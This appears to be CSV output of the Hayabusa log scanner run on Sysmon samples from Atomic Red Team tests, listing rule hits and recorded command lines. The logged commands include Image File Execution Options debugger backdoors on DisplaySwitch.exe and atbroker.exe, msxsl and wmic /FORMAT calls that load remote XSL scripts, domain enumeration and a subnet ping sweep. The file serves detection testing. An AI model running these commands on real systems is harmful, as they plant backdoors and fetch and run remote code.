Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 